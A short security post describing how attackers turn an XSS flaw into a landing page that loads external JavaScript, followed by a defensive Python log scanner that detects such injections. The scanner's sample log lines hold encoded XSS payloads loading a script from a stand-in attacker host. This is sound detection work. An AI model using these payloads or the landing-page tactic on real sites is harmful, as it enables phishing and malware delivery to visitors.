XSS to RCE: Convert Target Websites into Payload Landing Pages.
I recently came upon an interesting post about a threat actor’s tactic of converting a vulnerable website into a great payload landing page. With some variation, using an XSS vulnerability you can load an external JavaScript file, which creates a “new page” that you control for your pretext. The benefit of this tactic is that your landing page URL can still point to your client domain, but it can load whatever HTML code you want, download a payload file, masquerade as the real site, etc.
The impact of XSS isn’t always something like session stealing; sometimes it’s a whole new vector.
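From the defender's side, the tactic described above leaves a trace in web access logs: a request to the client domain whose parameter decodes to a script tag sourced from another host. The following is an added example, not code from the original post; the host names, the `TRUSTED_HOSTS` allowlist and the log lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: hosts the client site legitimately loads scripts from.
TRUSTED_HOSTS = {"www.client.example", "static.client.example"}
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /search?q=shoes HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /search?q=%3Cscript%20src%3D'
    'https%3A%2F%2Fcdn.attacker.example%2Fp.js%3E%3C%2Fscript%3E HTTP/1.1" 200 734',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /search?q=%253Cscript%2520src'
    '%253D%252F%252Fcdn.attacker.example%252Fp.js%253E HTTP/1.1" 200 734',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /preview?html=%3Cscript%20src'
    '%3Dhttps%3A%2F%2Fstatic.client.example%2Fa.js%3E HTTP/1.1" 200 901',
]

def decode_fully(value, rounds=3):
    """Undo nested URL-encoding (e.g. %253C) for a bounded number of rounds."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def external_script_hosts(url):
    """Return off-site hosts named by script tags inside the URL's parameters."""
    hosts = []
    for _, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for src in SCRIPT_SRC.findall(decode_fully(raw)):
            try:
                host = urlsplit(src).hostname  # None for relative paths
            except ValueError:
                continue  # malformed authority; not resolvable to a host
            if host and host not in TRUSTED_HOSTS:
                hosts.append(host)
    return hosts

def scan(lines):
    """Return (line_number, hosts) for requests injecting an off-site script."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hosts = external_script_hosts(match.group(1)) if match else []
        if hosts:
            findings.append((number, hosts))
    return findings
```

A hit here only shows the request was made; whether the page reflected the parameter unescaped still has to be confirmed against the application, and a Content-Security-Policy `script-src` limited to the trusted hosts blocks the external load even when the reflection exists.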